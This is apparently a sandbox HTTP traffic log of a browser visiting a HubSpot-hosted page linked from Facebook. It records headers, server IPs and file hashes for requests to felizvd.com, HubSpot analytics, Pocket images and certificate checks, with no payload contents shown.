                                            GET /?api=1&lan=twthk&ht=2&counter0=cococho01 HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Thu, 15 Sep 2022 09:56:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=t2mc6a1vr3k409b52tur449f2s; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512222
Md5:    6e3f46d32347b09c3400e7ba5a35e2b9
Sha1:   78ff982e7ee593ec072205235f32ea9261b078e8
Sha256: 68e207154c227dddaa31a4acb7d58296dc2a2e981650bc8f9385f22ed0cfd279
                                        
                                            GET /location HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx
Date: Thu, 15 Sep 2022 09:56:52 GMT
Content-Length: 237
Connection: keep-alive
Location: https://felizvd.com/location/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   237
Md5:    0fef66e5d094fd5d91561b9c03320d9e
Sha1:   9c213b1d3b04836b255a65124ad96b4eacd9ab26
Sha256: 78645463804d6b08abadc3b2b83989fc96d69a7855e75fca9deda265c95b9c9b
                                        
                                            GET /location/ HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://news4kcnn.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Thu, 15 Sep 2022 09:56:52 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            GET /widget/cococho01 HTTP/1.1 
Host: whos.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.22.75.171
HTTP/2 307 Temporary Redirect
content-type: text/html; charset=UTF-8
                                        
date: Thu, 15 Sep 2022 09:56:53 GMT
location: https://widgets.amung.us/classic/00/2.png
cache-control: no-cache, no-store, must-revalidate
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 74b07eb6ba809906-ARN
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1392
Md5:    766252730f2b1205ceef63a3e8ac4da0
Sha1:   e47926ea509e71e4f33f84cff4d516a368846ed8
Sha256: 9f8edd3ed559df45e389eb4ce81ed33ae75d33037024653a350b5ba26b4a2651
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10514
Expires: Thu, 15 Sep 2022 12:52:07 GMT
Date: Thu, 15 Sep 2022 09:56:53 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10514
Expires: Thu, 15 Sep 2022 12:52:07 GMT
Date: Thu, 15 Sep 2022 09:56:53 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10514
Expires: Thu, 15 Sep 2022 12:52:07 GMT
Date: Thu, 15 Sep 2022 09:56:53 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10514
Expires: Thu, 15 Sep 2022 12:52:07 GMT
Date: Thu, 15 Sep 2022 09:56:53 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F86bf6a5e-a3e5-479d-a052-fa843c45a3d9.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9400
x-amzn-requestid: 8cf35176-18a1-427b-870c-bdae465060c8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YYM18E-iIAMFcmg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631ff4f2-427bc0ff6593e71e25b91589;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 03:11:46 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ZVnPAYUOBCRUYD3wEx79lIMjBJCKyVB9CmnTqMJIaFPbQGPoHwB73w==
via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:37 GMT
age: 48916
etag: "96ab8cd8e14350f730d26731f3445710324e24e2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9400
Md5:    4833535b1650b0ac875704023b650e66
Sha1:   96ab8cd8e14350f730d26731f3445710324e24e2
Sha256: d2b5a51e39a4890ba56e819d4d5d1d57d4d3cfc50dde42efdf23b8e9be17d1c7
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3f370e89-6cc5-4da8-83dc-68d5a685ce0f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9340
x-amzn-requestid: 23ab295a-91a0-4a91-ba26-8302088a50c2
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YNxvmEPIIAMFZlQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631bc996-10ccfaf45b93ef066901573d;Sampled=0
x-amzn-remapped-date: Fri, 09 Sep 2022 23:17:42 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: j_TffmLpWMBRCuHyrY6e6DuD3g8nOMX296pqnkra4KHsAwSkXj-3_w==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 82ea95080f526df99896343fb7269b06.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 22:00:43 GMT
age: 42970
etag: "b8ae9f4346fe63c5aa7a3b07ef84eac8fc63ca94"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9340
Md5:    a05eafb022d09a0c88432fe018f2c325
Sha1:   b8ae9f4346fe63c5aa7a3b07ef84eac8fc63ca94
Sha256: 91b3994632d954d1c93ee53a46d2d8850ebe387af40962aad787d341b742e9f0
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6e9a2626-acb3-4c73-9ff9-e09ad82d489e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8447
x-amzn-requestid: 3237c2fa-bc17-4b8d-8afd-bacfaa90ca71
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X7FypF7KIAMFd7A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63145010-7052273b184685c83569c712;Sampled=0
x-amzn-remapped-date: Sun, 04 Sep 2022 07:13:20 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: wzi_WnjJW5XjIfj8kyVL4LcQEjcuw1_zwrDiJegEZ2r8GOZcQahPEw==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:46:45 GMT
age: 43808
etag: "14131148fda4e8d85b582fd20e76bcc814341bf1"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8447
Md5:    5a6939786c9343412c9af87efd3f44e0
Sha1:   14131148fda4e8d85b582fd20e76bcc814341bf1
Sha256: 8412c50f0fdc131d9c4422f2d7307fc1ee062c3580a1d754ef71cf84f9727d49
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F2d547c90-3ccc-4c25-a8e5-de1d932a8cfb.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3951
x-amzn-requestid: 65c15365-1bff-4dd2-a651-33683a033e05
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YE9_oHP_oAMF3Fw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63184397-148253910e5cd21b0e436b09;Sampled=0
x-amzn-remapped-date: Wed, 07 Sep 2022 07:09:11 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: _BTSN2zHd-FiETAJVrQhk9Odsn_M3GGs0nU0QpLrE9Rpin0VQPzy2w==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 22:19:41 GMT
age: 41832
etag: "cab4d850cd2bc5b3e1570ae837a58382e6eae5ec"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3951
Md5:    aaf675adec05212317877a5f479d11a7
Sha1:   cab4d850cd2bc5b3e1570ae837a58382e6eae5ec
Sha256: cb4eb5b406f1ec01e3094d0519d8e4e7a469056bb898e2c47d48378e4b2b261d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb3545c74-7af3-4ad8-815b-6a50681a2362.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10633
x-amzn-requestid: 8dbc7f5f-1cb9-4b45-913d-2d4db71449fd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X7FSvG98IAMFeLQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63144f44-3094163533977c6d1ee90274;Sampled=0
x-amzn-remapped-date: Sun, 04 Sep 2022 07:09:56 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 5Gx5Pfp0fH7GtvITXwV1CVZlM6wbfIXmyk_4xZtIVf8qkmg0AyxBPQ==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 e80693c02cfdfd081110512210d57840.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:01 GMT
age: 48952
etag: "13d42d455f5131b7b861b97eb3f0e91236d4d222"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10633
Md5:    f42b72c3fd66a6758ebcf0ca8cc1a046
Sha1:   13d42d455f5131b7b861b97eb3f0e91236d4d222
Sha256: 4a07fcacde77dc890164fda9f295b61af6947b2d7f3f84f64749d93e3a1e5b99
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5754e945-dac1-48d0-8300-12286ffe02b4.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10188
x-amzn-requestid: 48b5c3c4-d155-4e66-949e-ed631bf43890
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YeB3VFE7IAMFcnw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632249c8-2c5c452071eddd8e23dd6393;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 21:38:16 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: lV7xI9zbmNkxxItOZkSiVHwQRl4FnvJYqtNfuXJKFfrDiRuUC28oNQ==
via: 1.1 470e3fe246a660ba6ace67a79f78d246.cloudfront.net (CloudFront), 1.1 5954c6394458ffb44c970b3819d7ff2a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:48:12 GMT
age: 43721
etag: "c096bfad52996315c174183644db3cc2c77d5f2c"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10188
Md5:    d62d6861a80946a4cf3ba7e2a1cb0638
Sha1:   c096bfad52996315c174183644db3cc2c77d5f2c
Sha256: 693968cf7b76de9afb3440fe18800c02832daf3dd8a5de547e6dd9b6e4096b53
                                        
                                            GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246936&callback=jsonpHandler HTTP/1.1 
Host: app-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.236.181
HTTP/2 204 No Content
                                        
date: Thu, 15 Sep 2022 09:56:54 GMT
cf-ray: 74b07eb778d715fc-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74b07eb778d715fc&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 1449fd8e-7230-4e41-988e-c426b7fa7b13
x-trace: 2B9F9A25860529870067FBCFFDBE51C3875E4056F1000000000000000000
set-cookie: __cf_bm=cjnXMg57xQ8FNtAhFSYLKf6YP3BprnlNg_doWGVCcAY-1663235814-0-AfBfOBwL7/3fwVJE02SasoklMb0EZtpYGcs2QpllnXxSpO0FXpf0hncbDXuQidvNYo6/57gF9oHBi4UjBTXO/Vs=; path=/; expires=Thu, 15-Sep-22 10:26:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
If-Modified-Since: Tue, 13 Sep 2022 10:41:10 UTC
If-None-Match: W/"7a468b833be86c01bc8dfd455308f792"
TE: trailers

                                         
                                         172.65.192.122
HTTP/2 304 Not Modified
                                        
date: Thu, 15 Sep 2022 09:56:54 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: "7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 c275031486c6f7b744b8d30847e98b14.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: AWscOfGeHaNRWzlDB9b9wJQggZ45nPDwH2aSKdo-mER9c-p5OiZJrQ==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74ac9bed5a05991e-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 40748
server: cloudflare
cf-ray: 74b07ec03f0d1685-ARN
X-Firefox-Spdy: h2

                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246936&pi=53117545672&ct=standard-page&ccu=http%3A%2F%2Fnews4kcnn.hs-sites-eu1.com&cpi=53117545672&lpi=53117545672&lvi=53117545672&pu=https%3A%2F%2Fnews4kcnn.hs-sites-eu1.com%2F%3Ffbclid%3DIwAR2SUqE3fjKPQKyOMxYQp-v0dMxgjllQibHMHfutOCraj_L8zYiwqwUzOPE%230.6065929920969331&t=Facebook+videos&cts=1663235799443&vi=1619a1653365320b2fa776dd1ea04ff3&nc=true&u=205882892.1619a1653365320b2fa776dd1ea04ff3.1663235799441.1663235799441.1663235799441.1&b=205882892.1.1663235799441&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 15 Sep 2022 09:56:55 GMT
content-length: 45
cf-ray: 74b07ec6fb9798ee-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Thu, 15 Sep 2022 09:56:55 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: a4543cf5-ff80-4855-aff2-a85965920037
x-robots-tag: none
set-cookie: __cf_bm=eG7vlqSt_QSkqe3n4j.Vohmn_d0WKw4mdHS7e7_.3J0-1663235815-0-ASyFZZzAiTUP0EEOXqvcZS+EHSfn1x50oEf60b1PGjPGX5ma38ZDNVZb3+pkojFTZWlB9cIKYGqzWPq9uENmnC8=; path=/; expires=Thu, 15-Sep-22 10:26:55 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Dgk8pmhq5NpFhgyawi9boS6KZLA4z9Oa%2BhPBc4NG45%2Bm8Zei6c%2BmHe8V1wS14PlwNGrRtIPTzXCN%2Fjuw4Q3ktbb3bn77t9jmUORbBDTkOMqwKjLYAhaHPToIHhHdk2%2BQuQZ2FsnicQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            GET /analytics/1663235700000/26246936.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
                                        
date: Thu, 15 Sep 2022 09:56:54 GMT
x-amz-id-2: 7BQZkBx8vIfPcIHL7n+63bVQQh92xvBIEfedpGAUvd71DhsG8lITrDBRTzQOuJQnyltH67Q8i0I=
x-amz-request-id: 3FJ9YWB70KGQPDVA
last-modified: Wed, 14 Sep 2022 11:45:11 GMT
etag: W/"961ca446759a9849f5f31f953b62814c"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Thu, 15 Sep 2022 10:01:54 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74b07ebd4fb79932-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (63804)
Size:   20131
